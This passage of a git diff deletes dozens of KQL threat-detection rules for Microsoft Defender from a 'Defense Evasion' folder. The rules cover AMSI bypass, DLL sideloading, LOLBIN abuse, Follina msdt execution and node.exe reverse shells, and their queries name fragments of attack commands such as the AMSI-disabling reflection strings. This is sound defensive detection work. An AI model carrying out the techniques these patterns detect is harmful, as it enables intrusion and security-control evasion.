ProcessCommandLine contains "/c" and FolderPath endswith "\\OpenWith.exe" \ No newline at end of file diff --git a/Defense Evasion/Outbound_Network_Connection_Initiated_By_Cmstp.EXE.kql b/Defense Evasion/Outbound_Network_Connection_Initiated_By_Cmstp.EXE.kql deleted file mode 100644 index 4dd5005e..00000000 --- a/Defense Evasion/Outbound_Network_Connection_Initiated_By_Cmstp.EXE.kql +++ /dev/null @@ -1,9 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/08/30 -// Level: high -// Description: Detects a network connection initiated by Cmstp.EXE -Its uncommon for "cmstp.exe" to initiate an outbound network connection. Investigate the source of such requests to determine if they are malicious. - -// Tags: attack.defense_evasion, attack.t1218.003 -DeviceNetworkEvents -| where InitiatingProcessFolderPath endswith "\\cmstp.exe" and (not((ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ipv4_is_in_range(RemoteIP, "10.0.0.0/8") or ipv4_is_in_range(RemoteIP, "172.16.0.0/12") or ipv4_is_in_range(RemoteIP, "192.168.0.0/16") or ipv4_is_in_range(RemoteIP, "169.254.0.0/16") or ipv4_is_in_range(RemoteIP, "::1/128") or ipv4_is_in_range(RemoteIP, "fe80::/10") or ipv4_is_in_range(RemoteIP, "fc00::/7")))) \ No newline at end of file diff --git a/Defense Evasion/Outbound_Network_Connection_To_Public_IP_Via_Winlogon.kql b/Defense Evasion/Outbound_Network_Connection_To_Public_IP_Via_Winlogon.kql deleted file mode 100644 index 88e21026..00000000 --- a/Defense Evasion/Outbound_Network_Connection_To_Public_IP_Via_Winlogon.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Christopher Peacock @securepeacock, SCYTHE @scythe_io -// Date: 2023/04/28 -// Level: medium -// Description: Detects a "winlogon.exe" process that initiate network communications with public IP addresses -// Tags: attack.defense_evasion, attack.execution, attack.command_and_control, attack.t1218.011 -DeviceNetworkEvents -| where InitiatingProcessFolderPath endswith "\\winlogon.exe" and (not((ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ipv4_is_in_range(RemoteIP, "10.0.0.0/8") or ipv4_is_in_range(RemoteIP, "172.16.0.0/12") or ipv4_is_in_range(RemoteIP, "192.168.0.0/16") or ipv4_is_in_range(RemoteIP, "169.254.0.0/16") or ipv4_is_in_range(RemoteIP, "::1/128") or ipv4_is_in_range(RemoteIP, "fe80::/10") or ipv4_is_in_range(RemoteIP, "fc00::/7")))) \ No newline at end of file diff --git a/Defense Evasion/Outlook_EnableUnsafeClientMailRules_Setting_Enabled_-_Registry.kql b/Defense Evasion/Outlook_EnableUnsafeClientMailRules_Setting_Enabled_-_Registry.kql deleted file mode 100644 index 925798e2..00000000 --- a/Defense Evasion/Outlook_EnableUnsafeClientMailRules_Setting_Enabled_-_Registry.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/02/08 -// Level: high -// Description: Detects an attacker trying to enable the outlook security setting "EnableUnsafeClientMailRules" which allows outlook to run applications or execute macros -// Tags: attack.defense_evasion, attack.t1112 -DeviceRegistryEvents -| where RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "\\Outlook\\Security\\EnableUnsafeClientMailRules" \ No newline at end of file diff --git a/Defense Evasion/PSScriptPolicyTest_Creation_By_Uncommon_Process.kql b/Defense Evasion/PSScriptPolicyTest_Creation_By_Uncommon_Process.kql deleted file mode 100644 index 744c3788..00000000 --- a/Defense Evasion/PSScriptPolicyTest_Creation_By_Uncommon_Process.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/06/01 -// Level: medium -// Description: Detects the creation of the "PSScriptPolicyTest" PowerShell script by an uncommon process. This file is usually generated by Microsoft Powershell to test against Applocker. -// Tags: attack.defense_evasion -DeviceFileEvents -| where FolderPath contains "__PSScriptPolicyTest_" and (not((InitiatingProcessFolderPath endswith ":\\Program Files\\PowerShell\\7-preview\\pwsh.exe" or InitiatingProcessFolderPath endswith ":\\Program Files\\PowerShell\\7\\pwsh.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\System32\\dsac.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\System32\\sdiagnhost.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\System32\\ServerManager.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell_ise.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\System32\\wsmprovhost.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\SysWOW64\\sdiagnhost.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell_ise.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe"))) \ No newline at end of file diff --git a/Defense Evasion/PUA_-_AdvancedRun_Execution.kql b/Defense Evasion/PUA_-_AdvancedRun_Execution.kql deleted file mode 100644 index 4e6050fc..00000000 --- a/Defense Evasion/PUA_-_AdvancedRun_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2022/01/20 -// Level: medium -// Description: Detects the execution of AdvancedRun utility -// Tags: attack.execution, attack.defense_evasion, attack.privilege_escalation, attack.t1564.003, attack.t1134.002, attack.t1059.003 -DeviceProcessEvents -| where ProcessVersionInfoOriginalFileName =~ "AdvancedRun.exe" or (ProcessCommandLine contains " /EXEFilename " and ProcessCommandLine contains " /Run") or (ProcessCommandLine contains " /WindowState 0" and ProcessCommandLine contains " /RunAs " and ProcessCommandLine contains " /CommandLine ") \ No newline at end of file diff --git a/Defense Evasion/PUA_-_AdvancedRun_Suspicious_Execution.kql b/Defense Evasion/PUA_-_AdvancedRun_Suspicious_Execution.kql deleted file mode 100644 index c00dd12f..00000000 --- a/Defense Evasion/PUA_-_AdvancedRun_Suspicious_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2022/01/20 -// Level: high -// Description: Detects the execution of AdvancedRun utility in the context of the TrustedInstaller, SYSTEM, Local Service or Network Service accounts -// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1134.002 -DeviceProcessEvents -| where (ProcessCommandLine contains "/EXEFilename" or ProcessCommandLine contains "/CommandLine") and ((ProcessCommandLine contains " /RunAs 8 " or ProcessCommandLine contains " /RunAs 4 " or ProcessCommandLine contains " /RunAs 10 " or ProcessCommandLine contains " /RunAs 11 ") or (ProcessCommandLine endswith "/RunAs 8" or ProcessCommandLine endswith "/RunAs 4" or ProcessCommandLine endswith "/RunAs 10" or ProcessCommandLine endswith "/RunAs 11")) \ No newline at end of file diff --git a/Defense Evasion/PUA_-_CleanWipe_Execution.kql b/Defense Evasion/PUA_-_CleanWipe_Execution.kql deleted file mode 100644 index 3da29794..00000000 --- a/Defense Evasion/PUA_-_CleanWipe_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2021/12/18 -// Level: high -// Description: Detects the use of CleanWipe a tool usually used to delete Symantec antivirus. -// Tags: attack.defense_evasion, attack.t1562.001 -DeviceProcessEvents -| where FolderPath endswith "\\SepRemovalToolNative_x64.exe" or (ProcessCommandLine contains "--uninstall" and FolderPath endswith "\\CATClean.exe") or (ProcessCommandLine contains "-r" and FolderPath endswith "\\NetInstaller.exe") or ((ProcessCommandLine contains "/uninstall" and ProcessCommandLine contains "/enterprise") and FolderPath endswith "\\WFPUnins.exe") \ No newline at end of file diff --git a/Defense Evasion/PUA_-_DefenderCheck_Execution.kql b/Defense Evasion/PUA_-_DefenderCheck_Execution.kql deleted file mode 100644 index d05b1bb7..00000000 --- a/Defense Evasion/PUA_-_DefenderCheck_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2022/08/30 -// Level: high -// Description: Detects the use of DefenderCheck, a tool to evaluate the signatures used in Microsoft Defender. It can be used to figure out the strings / byte chains used in Microsoft Defender to detect a tool and thus used for AV evasion. -// Tags: attack.defense_evasion, attack.t1027.005 -DeviceProcessEvents -| where FolderPath endswith "\\DefenderCheck.exe" or ProcessVersionInfoFileDescription =~ "DefenderCheck" \ No newline at end of file diff --git a/Defense Evasion/PUA_-_Potential_PE_Metadata_Tamper_Using_Rcedit.kql b/Defense Evasion/PUA_-_Potential_PE_Metadata_Tamper_Using_Rcedit.kql deleted file mode 100644 index 5d350006..00000000 --- a/Defense Evasion/PUA_-_Potential_PE_Metadata_Tamper_Using_Rcedit.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Micah Babinski -// Date: 2022/12/11 -// Level: medium -// Description: Detects the use of rcedit to potentially alter executable PE metadata properties, which could conceal efforts to rename system utilities for defense evasion. -// Tags: attack.defense_evasion, attack.t1036.003, attack.t1036, attack.t1027.005, attack.t1027 -DeviceProcessEvents -| where (ProcessCommandLine contains "OriginalFileName" or ProcessCommandLine contains "CompanyName" or ProcessCommandLine contains "FileDescription" or ProcessCommandLine contains "ProductName" or ProcessCommandLine contains "ProductVersion" or ProcessCommandLine contains "LegalCopyright") and ProcessCommandLine contains "--set-" and ((FolderPath endswith "\\rcedit-x64.exe" or FolderPath endswith "\\rcedit-x86.exe") or ProcessVersionInfoFileDescription =~ "Edit resources of exe" or ProcessVersionInfoProductName =~ "rcedit") \ No newline at end of file diff --git a/Defense Evasion/Parent_in_Public_Folder_Suspicious_Process.kql b/Defense Evasion/Parent_in_Public_Folder_Suspicious_Process.kql deleted file mode 100644 index 65b83f51..00000000 --- a/Defense Evasion/Parent_in_Public_Folder_Suspicious_Process.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2022/02/25 -// Level: high -// Description: This rule detects suspicious processes with parent images located in the C:\Users\Public folder -// Tags: attack.defense_evasion, attack.execution, attack.t1564, attack.t1059 -DeviceProcessEvents -| where (ProcessCommandLine contains "powershell" or ProcessCommandLine contains "cmd.exe /c " or ProcessCommandLine contains "cmd.exe /r " or ProcessCommandLine contains "cmd.exe /k " or ProcessCommandLine contains "cmd /c " or ProcessCommandLine contains "cmd /r " or ProcessCommandLine contains "cmd /k " or ProcessCommandLine contains "wscript.exe" or ProcessCommandLine contains "cscript.exe" or ProcessCommandLine contains "bitsadmin" or ProcessCommandLine contains "certutil" or ProcessCommandLine contains "mshta.exe") and InitiatingProcessFolderPath startswith "C:\\Users\\Public\\" \ No newline at end of file diff --git a/Defense Evasion/Password_Provided_In_Command_Line_Of_Net.EXE.kql b/Defense Evasion/Password_Provided_In_Command_Line_Of_Net.EXE.kql deleted file mode 100644 index 5662813f..00000000 --- a/Defense Evasion/Password_Provided_In_Command_Line_Of_Net.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Tim Shelton (HAWK.IO) -// Date: 2021/12/09 -// Level: medium -// Description: Detects a when net.exe is called with a password in the command line -// Tags: attack.defense_evasion, attack.initial_access, attack.persistence, attack.privilege_escalation, attack.lateral_movement, attack.t1021.002, attack.t1078 -DeviceProcessEvents -| where ((ProcessCommandLine contains " use " and (ProcessCommandLine contains ":" and ProcessCommandLine contains "\\") and (ProcessCommandLine contains "/USER:" and ProcessCommandLine contains " ")) and ((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") or (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe")))) and (not(ProcessCommandLine endswith " ")) \ No newline at end of file diff --git a/Defense Evasion/Persistence_Via_New_SIP_Provider.kql b/Defense Evasion/Persistence_Via_New_SIP_Provider.kql deleted file mode 100644 index 08cf0096..00000000 --- a/Defense Evasion/Persistence_Via_New_SIP_Provider.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/07/21 -// Level: medium -// Description: Detects when an attacker register a new SIP provider for persistence and defense evasion -// Tags: attack.persistence, attack.defense_evasion, attack.t1553.003 -DeviceRegistryEvents -| where ((RegistryKey contains "\\Dll" or RegistryKey contains "\\$DLL") and (RegistryKey contains "\\SOFTWARE\\Microsoft\\Cryptography\\Providers" or RegistryKey contains "\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType" or RegistryKey contains "\\SOFTWARE\\WOW6432Node\\Microsoft\\Cryptography\\Providers" or RegistryKey contains "\\SOFTWARE\\WOW6432Node\\Microsoft\\Cryptography\\OID\\EncodingType")) and (not(((RegistryValueData in~ ("WINTRUST.DLL", "mso.dll")) or (RegistryValueData =~ "C:\\Windows\\System32\\PsfSip.dll" and InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\poqexec.exe" and RegistryKey contains "\\CryptSIPDll")))) \ No newline at end of file diff --git a/Defense Evasion/Ping_Hex_IP.kql b/Defense Evasion/Ping_Hex_IP.kql deleted file mode 100644 index 5d98cb81..00000000 --- a/Defense Evasion/Ping_Hex_IP.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2018/03/23 -// Level: high -// Description: Detects a ping command that uses a hex encoded IP address -// Tags: attack.defense_evasion, attack.t1140, attack.t1027 -DeviceProcessEvents -| where ProcessCommandLine contains "0x" and FolderPath endswith "\\ping.exe" \ No newline at end of file diff --git a/Defense Evasion/Possible_Privilege_Escalation_via_Weak_Service_Permissions.kql b/Defense Evasion/Possible_Privilege_Escalation_via_Weak_Service_Permissions.kql deleted file mode 100644 index 8867fa02..00000000 --- a/Defense Evasion/Possible_Privilege_Escalation_via_Weak_Service_Permissions.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Teymur Kheirkhabarov -// Date: 2019/10/26 -// Level: high -// Description: Detection of sc.exe utility spawning by user with Medium integrity level to change service ImagePath or FailureCommand -// Tags: attack.persistence, attack.defense_evasion, attack.privilege_escalation, attack.t1574.011 -DeviceProcessEvents -| where (FolderPath endswith "\\sc.exe" and ProcessIntegrityLevel =~ "Medium") and ((ProcessCommandLine contains "config" and ProcessCommandLine contains "binPath") or (ProcessCommandLine contains "failure" and ProcessCommandLine contains "command")) \ No newline at end of file diff --git a/Defense Evasion/Potential_7za.DLL_Sideloading.kql b/Defense Evasion/Potential_7za.DLL_Sideloading.kql deleted file mode 100644 index f1cc961b..00000000 --- a/Defense Evasion/Potential_7za.DLL_Sideloading.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: X__Junior -// Date: 2023/06/09 -// Level: low -// Description: Detects potential DLL sideloading of "7za.dll" -// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002 -DeviceImageLoadEvents -| where FolderPath endswith "\\7za.dll" and (not(((FolderPath startswith "C:\\Program Files (x86)\\" or FolderPath startswith "C:\\Program Files\\") and (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\")))) \ No newline at end of file diff --git a/Defense Evasion/Potential_AMSI_Bypass_Using_NULL_Bits.kql b/Defense Evasion/Potential_AMSI_Bypass_Using_NULL_Bits.kql deleted file mode 100644 index 2ac0c70c..00000000 --- a/Defense Evasion/Potential_AMSI_Bypass_Using_NULL_Bits.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/01/04 -// Level: medium -// Description: Detects usage of special strings/null bits in order to potentially bypass AMSI functionalities -// Tags: attack.defense_evasion, attack.t1562.001 -DeviceProcessEvents -| where ProcessCommandLine contains "if(0){{{0}}}' -f $(0 -as [char]) +" or ProcessCommandLine contains "#" \ No newline at end of file diff --git a/Defense Evasion/Potential_AMSI_Bypass_Via_.NET_Reflection.kql b/Defense Evasion/Potential_AMSI_Bypass_Via_.NET_Reflection.kql deleted file mode 100644 index 59588cc9..00000000 --- a/Defense Evasion/Potential_AMSI_Bypass_Via_.NET_Reflection.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Markus Neis, @Kostastsale -// Date: 2018/08/17 -// Level: high -// Description: Detects Request to "amsiInitFailed" that can be used to disable AMSI Scanning -// Tags: attack.defense_evasion, attack.t1562.001 -DeviceProcessEvents -| where (ProcessCommandLine contains "System.Management.Automation.AmsiUtils" or ProcessCommandLine contains "amsiInitFailed") or (ProcessCommandLine contains "[Ref].Assembly.GetType" and ProcessCommandLine contains "SetValue($null,$true)" and ProcessCommandLine contains "NonPublic,Static") \ No newline at end of file diff --git a/Defense Evasion/Potential_AMSI_COM_Server_Hijacking.kql b/Defense Evasion/Potential_AMSI_COM_Server_Hijacking.kql deleted file mode 100644 index 8dc88184..00000000 --- a/Defense Evasion/Potential_AMSI_COM_Server_Hijacking.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/01/04 -// Level: high -// Description: Detects changes to the AMSI come server registry key in order disable AMSI scanning functionalities. When AMSI attempts to starts its COM component, it will query its registered CLSID and return a non-existent COM server. This causes a load failure and prevents any scanning methods from being accessed, ultimately rendering AMSI useless -// Tags: attack.defense_evasion, attack.t1562.001 -DeviceRegistryEvents -| where RegistryKey endswith "\\CLSID\\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\\InProcServer32\\(Default)" and (not(RegistryValueData =~ "%windir%\\system32\\amsi.dll")) \ No newline at end of file diff --git a/Defense Evasion/Potential_AVKkid.DLL_Sideloading.kql b/Defense Evasion/Potential_AVKkid.DLL_Sideloading.kql deleted file mode 100644 index e192e978..00000000 --- a/Defense Evasion/Potential_AVKkid.DLL_Sideloading.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: X__Junior (Nextron Systems) -// Date: 2023/08/03 -// Level: medium -// Description: Detects potential DLL sideloading of "AVKkid.dll" -// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1574.001, attack.t1574.002 -DeviceImageLoadEvents -| where FolderPath endswith "\\AVKkid.dll" and (not(((FolderPath startswith "C:\\Program Files (x86)\\G DATA\\" or FolderPath startswith "C:\\Program Files\\G DATA\\") and (InitiatingProcessFolderPath contains "C:\\Program Files (x86)\\G DATA\\" or InitiatingProcessFolderPath contains "C:\\Program Files\\G DATA\\") and InitiatingProcessFolderPath endswith "\\AVKKid.exe"))) \ No newline at end of file diff --git a/Defense Evasion/Potential_Adplus.EXE_Abuse.kql b/Defense Evasion/Potential_Adplus.EXE_Abuse.kql deleted file mode 100644 index 680e85fa..00000000 --- a/Defense Evasion/Potential_Adplus.EXE_Abuse.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/06/09 -// Level: high -// Description: Detects execution of "AdPlus.exe", a binary that is part of the Windows SDK that can be used as a LOLBIN in order to dump process memory and execute arbitrary commands. -// Tags: attack.defense_evasion, attack.execution, attack.t1003.001 -DeviceProcessEvents -| where (ProcessCommandLine contains " -hang " or ProcessCommandLine contains " -pn " or ProcessCommandLine contains " -pmn " or ProcessCommandLine contains " -p " or ProcessCommandLine contains " -po " or ProcessCommandLine contains " -c " or ProcessCommandLine contains " -sc ") and (FolderPath endswith "\\adplus.exe" or ProcessVersionInfoOriginalFileName =~ "Adplus.exe") \ No newline at end of file diff --git a/Defense Evasion/Potential_Antivirus_Software_DLL_Sideloading.kql b/Defense Evasion/Potential_Antivirus_Software_DLL_Sideloading.kql deleted file mode 100644 index 000b03f0..00000000 --- a/Defense Evasion/Potential_Antivirus_Software_DLL_Sideloading.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research) -// Date: 2022/08/17 -// Level: medium -// Description: Detects potential DLL sideloading of DLLs that are part of antivirus software suchas McAfee, Symantec...etc -// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002 -DeviceImageLoadEvents -| where (FolderPath endswith "\\log.dll" and (not(((FolderPath startswith "C:\\Program Files\\Bitdefender Antivirus Free\\" or FolderPath startswith "C:\\Program Files (x86)\\Bitdefender Antivirus Free\\") or FolderPath startswith "C:\\Program Files\\Canon\\MyPrinter\\" or (InitiatingProcessFolderPath =~ "C:\\Program Files\\Dell\\SARemediation\\audit\\TelemetryUtility.exe" and (FolderPath in~ ("C:\\Program Files\\Dell\\SARemediation\\plugin\\log.dll", "C:\\Program Files\\Dell\\SARemediation\\audit\\log.dll"))))))) or (FolderPath endswith "\\qrt.dll" and (not((FolderPath startswith "C:\\Program Files\\F-Secure\\Anti-Virus\\" or FolderPath startswith "C:\\Program Files (x86)\\F-Secure\\Anti-Virus\\")))) or ((FolderPath endswith "\\ashldres.dll" or FolderPath endswith "\\lockdown.dll" or FolderPath endswith "\\vsodscpl.dll") and (not((FolderPath startswith "C:\\Program Files\\McAfee\\" or FolderPath startswith "C:\\Program Files (x86)\\McAfee\\")))) or (FolderPath endswith "\\vftrace.dll" and (not((FolderPath startswith "C:\\Program Files\\CyberArk\\Endpoint Privilege Manager\\Agent\\x32\\" or FolderPath startswith "C:\\Program Files (x86)\\CyberArk\\Endpoint Privilege Manager\\Agent\\x32\\")))) or (FolderPath endswith "\\wsc.dll" and (not((FolderPath startswith "C:\\program Files\\AVAST Software\\Avast\\" or FolderPath startswith "C:\\program Files (x86)\\AVAST Software\\Avast\\")))) or (FolderPath endswith "\\tmdbglog.dll" and (not((FolderPath startswith "C:\\program Files\\Trend Micro\\Titanium\\" or FolderPath startswith "C:\\program Files (x86)\\Trend Micro\\Titanium\\")))) or (FolderPath endswith "\\DLPPREM32.dll" and (not((FolderPath startswith "C:\\program Files\\ESET" or FolderPath startswith "C:\\program Files (x86)\\ESET")))) \ No newline at end of file diff --git a/Defense Evasion/Potential_Application_Whitelisting_Bypass_via_Dnx.EXE.kql b/Defense Evasion/Potential_Application_Whitelisting_Bypass_via_Dnx.EXE.kql deleted file mode 100644 index 9fb59ef2..00000000 --- a/Defense Evasion/Potential_Application_Whitelisting_Bypass_via_Dnx.EXE.kql +++ /dev/null @@ -1,9 +0,0 @@ -// Author: Beyu Denis, oscd.community -// Date: 2019/10/26 -// Level: medium -// Description: Detects the execution of Dnx.EXE. The Dnx utility allows for the execution of C# code. -Attackers might abuse this in order to bypass application whitelisting. - -// Tags: attack.defense_evasion, attack.t1218, attack.t1027.004 -DeviceProcessEvents -| where FolderPath endswith "\\dnx.exe" \ No newline at end of file diff --git a/Defense Evasion/Potential_Arbitrary_Code_Execution_Via_Node.EXE.kql b/Defense Evasion/Potential_Arbitrary_Code_Execution_Via_Node.EXE.kql deleted file mode 100644 index 3a7f1b22..00000000 --- a/Defense Evasion/Potential_Arbitrary_Code_Execution_Via_Node.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/09/09 -// Level: high -// Description: Detects the execution node.exe which is shipped with multiple software such as VMware, Adobe...etc. In order to execute arbitrary code. For example to establish reverse shell as seen in Log4j attacks...etc -// Tags: attack.defense_evasion, attack.t1127 -DeviceProcessEvents -| where ((ProcessCommandLine contains " -e " or ProcessCommandLine contains " --eval ") and FolderPath endswith "\\node.exe") and (ProcessCommandLine contains ".exec(" and ProcessCommandLine contains "net.socket" and ProcessCommandLine contains ".connect" and ProcessCommandLine contains "child_process") \ No newline at end of file diff --git a/Defense Evasion/Potential_Arbitrary_Command_Execution_Using_Msdt.EXE.kql b/Defense Evasion/Potential_Arbitrary_Command_Execution_Using_Msdt.EXE.kql deleted file mode 100644 index 8bb69102..00000000 --- a/Defense Evasion/Potential_Arbitrary_Command_Execution_Using_Msdt.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/05/29 -// Level: high -// Description: Detects processes leveraging the "ms-msdt" handler or the "msdt.exe" binary to execute arbitrary commands as seen in the follina (CVE-2022-30190) vulnerability -// Tags: attack.defense_evasion, attack.t1202 -DeviceProcessEvents -| where (FolderPath endswith "\\msdt.exe" or ProcessVersionInfoOriginalFileName =~ "msdt.exe") and (ProcessCommandLine contains "IT_BrowseForFile=" or (ProcessCommandLine contains " PCWDiagnostic" and (ProcessCommandLine contains " -af " or ProcessCommandLine contains " /af "))) \ No newline at end of file diff --git a/Defense Evasion/Potential_Arbitrary_Command_Execution_Via_FTP.EXE.kql b/Defense Evasion/Potential_Arbitrary_Command_Execution_Via_FTP.EXE.kql deleted file mode 100644 index 4d1541c8..00000000 --- a/Defense Evasion/Potential_Arbitrary_Command_Execution_Via_FTP.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Victor Sergeev, oscd.community -// Date: 2020/10/09 -// Level: medium -// Description: Detects execution of "ftp.exe" script with the "-s" or "/s" flag and any child processes ran by "ftp.exe". -// Tags: attack.execution, attack.t1059, attack.defense_evasion, attack.t1202 -DeviceProcessEvents -| where InitiatingProcessFolderPath endswith "\\ftp.exe" or ((ProcessCommandLine contains "-s:" or ProcessCommandLine contains "/s:") and (FolderPath endswith "\\ftp.exe" or ProcessVersionInfoOriginalFileName =~ "ftp.exe")) \ No newline at end of file diff --git a/Defense Evasion/Potential_Arbitrary_DLL_Load_Using_Winword.kql b/Defense Evasion/Potential_Arbitrary_DLL_Load_Using_Winword.kql deleted file mode 100644 index 634eadc3..00000000 --- a/Defense Evasion/Potential_Arbitrary_DLL_Load_Using_Winword.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Victor Sergeev, oscd.community -// Date: 2020/10/09 -// Level: medium -// Description: Detects potential DLL sideloading using the Microsoft Office winword process via the '/l' flag. -// Tags: attack.defense_evasion, attack.t1202 -DeviceProcessEvents -| where (ProcessCommandLine contains "/l " and ProcessCommandLine contains ".dll") and (FolderPath endswith "\\WINWORD.exe" or ProcessVersionInfoOriginalFileName =~ "WinWord.exe") \ No newline at end of file diff --git a/Defense Evasion/Potential_Arbitrary_File_Download_Using_Office_Application.kql b/Defense Evasion/Potential_Arbitrary_File_Download_Using_Office_Application.kql deleted file mode 100644 index 2fb5e04e..00000000 --- a/Defense Evasion/Potential_Arbitrary_File_Download_Using_Office_Application.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems), Beyu Denis, oscd.community -// Date: 2022/05/17 -// Level: high -// Description: Detects potential arbitrary file download using a Microsoft Office application -// Tags: attack.defense_evasion, attack.t1202 -DeviceProcessEvents -| where (ProcessCommandLine contains "http://" or ProcessCommandLine contains "https://") and ((FolderPath endswith "\\EXCEL.EXE" or FolderPath endswith "\\POWERPNT.EXE" or FolderPath endswith "\\WINWORD.exe") or (ProcessVersionInfoOriginalFileName in~ ("Excel.exe", "POWERPNT.EXE", "WinWord.exe"))) \ No newline at end of file diff --git a/Defense Evasion/Potential_Arbitrary_File_Download_Via_Cmdl32.EXE.kql b/Defense Evasion/Potential_Arbitrary_File_Download_Via_Cmdl32.EXE.kql deleted file mode 100644 index 4d75232f..00000000 --- a/Defense Evasion/Potential_Arbitrary_File_Download_Via_Cmdl32.EXE.kql +++ /dev/null @@ -1,10 +0,0 @@ -// Author: frack113 -// Date: 2021/11/03 -// Level: medium -// Description: Detects execution of Cmdl32 with the "/vpn" and "/lan" flags. -Attackers can abuse this utility in order to download arbitrary files via a configuration file. -Inspect the location and the content of the file passed as an argument in order to determine if it is suspicious. - -// Tags: attack.execution, attack.defense_evasion, attack.t1218, attack.t1202 -DeviceProcessEvents -| where (ProcessCommandLine contains "/vpn" and ProcessCommandLine contains "/lan") and (FolderPath endswith "\\cmdl32.exe" or ProcessVersionInfoOriginalFileName =~ "CMDL32.EXE") \ No newline at end of file diff --git a/Defense Evasion/Potential_Attachment_Manager_Settings_Associations_Tamper.kql b/Defense Evasion/Potential_Attachment_Manager_Settings_Associations_Tamper.kql deleted file mode 100644 index e9726a4d..00000000 --- a/Defense Evasion/Potential_Attachment_Manager_Settings_Associations_Tamper.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/08/01 -// Level: high -// Description: Detects tampering with attachment manager settings policies associations to lower the default file type risks (See reference for more information) -// Tags: attack.defense_evasion -DeviceRegistryEvents -| where RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Associations" and ((RegistryValueData =~ "DWORD (0x00006152)" and RegistryKey endswith "\\DefaultFileTypeRisk") or ((RegistryValueData contains ".zip;" or RegistryValueData contains ".rar;" or RegistryValueData contains ".exe;" or RegistryValueData contains ".bat;" or RegistryValueData contains ".com;" or RegistryValueData contains ".cmd;" or RegistryValueData contains ".reg;" or RegistryValueData contains ".msi;" or RegistryValueData contains ".htm;" or RegistryValueData contains ".html;") and RegistryKey endswith "\\LowRiskFileTypes")) \ No newline at end of file diff --git a/Defense Evasion/Potential_Attachment_Manager_Settings_Attachments_Tamper.kql b/Defense Evasion/Potential_Attachment_Manager_Settings_Attachments_Tamper.kql deleted file mode 100644 index 9a5ab3b6..00000000 --- a/Defense Evasion/Potential_Attachment_Manager_Settings_Attachments_Tamper.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/08/01 -// Level: high -// Description: Detects tampering with attachment manager settings policies attachments (See reference for more information) -// Tags: attack.defense_evasion -DeviceRegistryEvents -| where RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Attachments" and ((RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "\\HideZoneInfoOnProperties") or (RegistryValueData =~ "DWORD (0x00000002)" and RegistryKey endswith 